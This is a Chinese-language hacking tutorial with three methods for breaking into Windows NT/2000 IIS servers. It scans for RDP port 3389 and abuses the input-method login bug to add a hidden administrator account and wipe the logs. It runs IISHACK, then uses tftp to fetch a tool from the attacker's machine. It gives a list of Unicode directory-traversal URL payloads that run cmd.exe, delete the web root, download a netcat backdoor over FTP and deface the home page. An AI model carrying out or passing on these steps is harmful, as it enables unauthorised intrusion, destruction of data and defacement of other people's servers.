| 流光工具對 NT 攻擊教學之二 來源:BlackHawk |
攻擊方法一﹕
使用掃描固定埠的掃描工具,直接掃描 3389 埠就可以了.
目標主機必須條件﹕WIN2000 的操作系統,開放遠端 3389 埠及輸入法漏洞.
使用 Grinder 輸入一段 IP 位址掃描,嘿嘿,掃到一些 NT 的了.
XXX.34.218.100 URL Present Microsoft-IIS/5.0
XXX.34.218.101 URL Present Microsoft-IIS/5.0
XXX.34.218.102 URL Present Microsoft-IIS/5.0
XXX.34.218.103 URL Present Microsoft-IIS/5.0
XXX.34.218.104 URL Present Microsoft-IIS/5.0
...........................................
然後將 IP 位址逐個輸入到 HAKTEK 裡面掃描 3389 埠,就可以找到一些了﹕
xxx.34.218.100
..............
開客戶端軟件,輸入 IP 位址確認,呵呵,對方的登陸畫面出現在客戶端裡了,
在用戶名裡輸入幾個任意字元,然後按 Ctrl+shift 鍵,將輸入法轉化為全形模式,
將游標放在狀態列的全形圖示上按右鍵,然後在協助選項的裡面選擇輸入法入門
(如果能彈出輸入法入門的話,那就說明這個機器有輸入法漏洞,如果沒有的話,
那就換台機器試試吧!)再然後就在這個頁面的“選項”上按右鍵,在彈出的選項裡
選擇跳至 URL,在新彈出跳至 URL 的選項裡輸入 c:\winnt\system32 並確認,呵呵,
出來了。
現在有兩種方法可以攻擊﹕
1. 將對方 c:\winnt\system32 裡的 cmd.exe 拷貝到 c:\inetpub\scripts\
然後在瀏覽器裡進行攻擊
http://xxx.34.218.100/scripts/cmd.exe?/c+dir
這種攻擊類似於 unicode 漏洞的攻擊方法。
2. 在右邊的視窗裡選擇 net.exe,右鍵後選擇建立捷徑方式,然後就會產生一個
net.lnk 的檔案,就在這個檔案上按右鍵選擇屬性,在彈出的新視窗裡的目標輸入:
C:\winnt\system32\net.exe user sharpwinner/add
確認後,這個視窗就會消失,呵呵,不用慌張,這個 net.lnk 將這條命令加入到了它
裡面去了,然後你只要雙擊這個 net.lnk, 對方的電腦就會運行這項命令,然後我們
將這個帳號加入到 administrators 群組裡面去:
C:\winnt\system32\net.exe localgroup administrators sharpwinner/add
這一階段的任務完成,關掉協助等彈出的視窗,在客戶端中輸入帳號﹕sharpwinner,
密碼為空,Enter! 哈哈,進去了,在目標電腦的 c:\winnt\system32\ 裡面將我們建
的 net.lnk 刪掉,立刻到日誌文件下刪掉所有的記錄:c:\winnt\system32\logfiles
============================================================================
攻擊方法二﹕
IISHACK 攻擊法需要工具﹕iishack netcat 和 tftp 還有 netdde
(PS: iishack.exe 是攻擊 NT4.0,iishack1.exe 是攻擊 NT5.0)
首先,將 TFTP 裝到自己機器裡面,將自己的機器變成一個 FTP 服務器。
然後,利用前面找到的 nt 機器 xxx.34.218.100 來進行攻擊﹕
c:\iishack xxx.34.218.100 80 99
如果顯示攻擊成功的話,那就可以再輸入﹕
c:\telnet xxx.34.218.100 99
呵呵,進去了,然後進入到對方的 c:\winnt\system32\ 裡面,輸入﹕
c:\winnt\system32\tftp -i <自己的IP位址> get netdde.exe
然後再運行 netdde.exe,建立一個帳號,將它的權限提升到 administrators 組﹕
c:\winnt\system32\netdde.exe net user make love /add
c:\winnt\system32\netdde.exe net localgroup administrators make /add
然後退出,用 net use \\xxx.34.218.100\ipc$ love /user:make
建立 IPC 連接,然後就不用我再說了吧。
============================================================================
攻擊方法三﹕
攻擊需要工具﹕rscan
UNICODE 漏洞,呵呵,大家肯定都用過了吧,我這裡利用方法和你們的不一樣,
不信就來看看﹕現在先告訴大家不同語言系統的利用語句﹕
簡體中文的 NT4 編碼為 %c1%9c
簡體中文的 NT5.0 編碼為%c1%1c
英文操作系統 NT5.0 的是 %c0%af
在國外的一些網站中看到還有一些其他的編碼﹕
%c1%pc
%c0%2f
%c1%1c
%c0%2f
%c1%1c
%c0%2f
%c0%2f
%c0%9v
%c0%qf
%c1%8s
%e0%80%af
%f0%80%80%af
%fc%80%80%80%80%af
有空大家可以測試。
我們現在就以簡體中文的 nt5.0 或 nt4.0 的編碼為例
先打開 rscan 工具,將編碼的語句輸入到裡面去﹕(選擇其中的一種)
/_mem_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/_vti_bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/cgi-bin/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/msadc/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
/scripts/..%c1%1c..%c1%1c..%c1%1c../winnt/system32/cmd.exe
然後,我們以 /scripts/..%c1%1c../winnt/system32/cmd.exe 為例來進行攻擊。
(PS: ..%c1%1c..%c1%1c..%c1%1c..是向上退出 4 層, ..%c1%1c..是向上退出兩層,
我們的目錄是 c:\inetpub\scripts,所以向上退出兩層就可以了)
先給大家一個 UNICODE 攻擊的工具集吧!
1. 顯示文件的內容(type 命令)
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+type+c:\redhacker.txt
2. 刪掉空的子目錄(rd 命令)
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+rd+c:\badboy.txt
簡單的就不用再說了,大家只要熟悉 windows 命令就可以了,我們來點 cool一點的。
3. 我們將 c:\winnt\system32 的 cmd.exe 改名並拷到 c:\inetpub\scripts\ccc.exe
那我們就可以這樣來顯示對方硬碟了﹕
http://x.x.x.x/scripts/ccc.exe?/c+dir
4. 查找主頁的存放地,我們就用最快的方法來查找 index.htm 或 index.html)
http://x.x.x.x/scripts/ccc.exe?/c+c:/winnt/system32/find.exe?/n+/v+""+c:\xxx\*.ht*
5. 批處理命令運用法(.bat)
http://x.x.x.x/scripts/ccc.exe?/c+echo+del /f /s /q c:\inetpub\wwwroot\*.* > sharpwinner.txt
http://x.x.x.x/scripts/ccc.exe?/c+echo+rd /f /s /q c:\inetpub\wwwroot >> sharpwinner.txt
這樣對方的 C 碟的 c:\inetpub\wwwroot 目錄和裡面的檔案都被刪掉了。
6. attrib 命令的用法。
http://x.x.x.x/scripts/..%c1%1c../winnt/system32/attrib.exe? -r -h c:\inetpub\wwwroot\index.html
7. ftp 的用法。
http://x.x.x.x/scripts/ccc.exe?/c+echo+open+*.*.*.*>redhacker.txt
http://x.x.x.x/scripts/ccc.exe?/c+echo+user>>redhacker.txt
http://x.x.x.x/scripts/ccc.exe?/c+echo+pass>>redhacker.txt
http://x.x.x.x/scripts/ccc.exe?/c+echo+get+srv.exe>>redhacker.txt
http://x.x.x.x/scripts/ccc.exe?/c+echo+bye>>redhacker.txt
這裡的 srv.exe 就是 nc99.exe
8. echo 命令的用法
http://x.x.x.x/scripts/ccc.exe?/c+echo+hacked by sharpwinner > c:\inetpub\wwwroot\index.html
打開瀏覽器一看,index.html 的內容變成了 hacked by sharpwinner,篡改成功。